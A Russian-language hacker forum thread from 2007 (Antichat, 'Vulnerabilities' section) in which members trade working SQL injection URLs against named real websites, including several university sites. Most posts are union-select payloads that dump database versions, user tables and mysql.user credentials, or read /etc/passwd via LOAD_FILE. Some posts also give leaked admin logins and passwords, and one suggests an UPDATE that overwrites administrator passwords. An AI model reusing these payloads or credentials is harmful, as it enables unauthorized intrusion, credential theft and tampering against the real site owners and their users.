ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #801  
Старый 09.03.2007, 18:03
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

http://www.agenciapulsar.org/coberturas_det.php?id=-1+union+select+1,version(),user(),4,5,6,7,8/*
 
Ответить с цитированием

  #802  
Старый 09.03.2007, 18:21
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

пошел значит я почитать про выборы в Питере...
Код:
http://www.vybor-spb.ru/area.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4+from+mysql.user/*
вот как у нас хорошо готовятся)
 
Ответить с цитированием

  #803  
Старый 09.03.2007, 19:07
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

-вырезано-
ошибочка
 
Ответить с цитированием

  #804  
Старый 09.03.2007, 19:09
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

решил слить всё что у меня накопилось =D ужос..
начнём с ЭДУ
Цитата:
http://www.eng.wayne.edu/news.php?id=-99+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,0,1,2,3/*
Цитата:
http://biomedical.rutgers.edu/faculty.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,concat(login,cha r(58),password),11,12,13,14,15,16,17,18,19,20+from +users
admin:tm9537!# - вход в админку справа. Ничё интересного я там не нашёл
Цитата:
http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f70617 3737764),6,7,8,9,10,11/*
поддомен Гарварда. Находится к сожалению на другом серваке
Цитата:
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10 ,11,12,13,14,15,16,17+from+access
так и не нашёл как попасть в админку. Хотя искал не очень внимательно... =)
Цитата:
http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,table_name,8,9,10+from +information_schema.tables+limit+16,1/*
хз чё там. Сервак на винде
Цитата:
http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*
Цитата:
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,concat(user,char(58),password),14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42+from+mysql.user/*
Цитата:
http://www.hcs.harvard.edu/~hib/viewannounce.php?ID=-1+union+select+1,2,version(),4,5/*
опять поддомен гарварда и опять другой сервер
Цитата:
http://www.mcli.dist.maricopa.edu/ocotillo/retreat05/demos.php?id=-17+union+select+1,2,3,4,5,6,7,LOAD_FILE('/tmp/preved.php'),9,10,11,12,13,14,15,16,17
Превед
Цитата:
http://www.bu.edu/phpbin/news/releases/display.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,convert(version()+using+latin1)/*
Цитата:
http://www.housing.wisc.edu/resnet/news/story.php?id=-10+union+select+1,2,3,4,5,concat(user,char(58),pas sword),7,8,9,10+from+mysql.user
Цитата:
http://slim.climaxdesigns.com/tutorial.php?section=slim&id=-1+union+select+1,2,null,4,concat(user,char(58),pas sword)+from+users+limit+0,1/*
Цитата:
http://www.cageprisoners.com/page.php?id=-3+union+select+1,2,concat(username,char(58),passwo rd)+from+admins+limit+0,1
Цитата:
http://www.mp3collection.ru/links/cats.php?id=-16+union+select+1,2,3,4,5,6,7,8,concat(name,char(5 8),password),null,11,12,13,14,15,16+from+users+lim it+0,5000/*
без лимита страничка наглухо виснет и негрузится
Цитата:
http://www.labnow.com/product_updates.php?id=-13+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12,13+from+users+limit+0,1
Цитата:
http://www.grivelnorthamerica.com/ambassadors.php?id=-5+union+select+1,user,3,pass,5+from+users
Цитата:
http://www.gooom.com/artists.php?id=-13+union+select+1,mail,3,4,5,6,7,8,9,10,11,12,13+f rom+users
Цитата:
http://www.redbarngarden.com/index.php?id=-3+union+select+concat(username,char(58),passwd,cha r(58),auth),2,3+from+cms_auth
как сказал Грей пароль в SHA-1
Цитата:
http://www.dysgenicrecords.com/artist.php?id=-17+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17
Цитата:
http://www.globelines.com.ph/DataServiceHomeUse.php?id=-10+union+select+1,2,3,4,convert(version()+using+la tin1),6,7,8,9,10
ууух. Ну вот это пока что всё =) ещё где то была скуля в зоне GOV но я потерял =)
 
Ответить с цитированием

  #805  
Старый 09.03.2007, 20:01
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

PHP код:
http://alx.ultranet.ru/joke_show.php?id=-1+union+select+1,version(),user()/* 
PHP код:
http://www.tklenta.ru/articles_txt.php?id=-1+union+select+user(),version()/* 

Последний раз редактировалось Colkru; 09.03.2007 в 20:06..
 
Ответить с цитированием

  #806  
Старый 09.03.2007, 20:06
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

вот от меня скуля
Код:
http://lib.prometey.org/?lib=forum&t=-92+union+select+1,concat(user_login,char(58),user_pass,char(58),user_mail)+FROM+user+limit+10353,1/*
не плохо 10353 юзеров и все пассы в чистом виде
login:bob
pass:mixail26
сама админка http://lib.prometey.org/admin.php
 
Ответить с цитированием

  #807  
Старый 09.03.2007, 20:35
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

PHP код:
http://www.intercar.com.ua/index.php?id=-1+union+select+1,2,version(),user(),5,6+from+users/* 
PHP код:
http://www.viking.tm/product.php?id=-1+union+select+1,2,3,4,5,6,7/* 
PHP код:
http://chugworth.com/comic.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/* 

Последний раз редактировалось Colkru; 09.03.2007 в 20:46..
 
Ответить с цитированием

  #808  
Старый 09.03.2007, 21:11
Аватар для KPOT_f!nd
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

PHP код:
www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8
 
Ответить с цитированием

  #809  
Старый 09.03.2007, 21:29
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от KPOT_f!nd  
PHP код:
www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8
можно кста вот так:
Код:
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
&&
Код:
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12+from+mysql.user/*

Последний раз редактировалось n1†R0x; 09.03.2007 в 23:40..
 
Ответить с цитированием

  #810  
Старый 09.03.2007, 22:03
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

http://www.vrijwilligerswerk.be/informatie/informatie.php?id=2+order+by+99
UPDATE
т е можно сделать +union+update+admins+set+password='preved'

http://www.soaw.org/new/sub.php?id=2+order+by+99

http://pride.uoregon.edu/section.php?id=-6+unioN+select+1,2,3,4,5,6
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ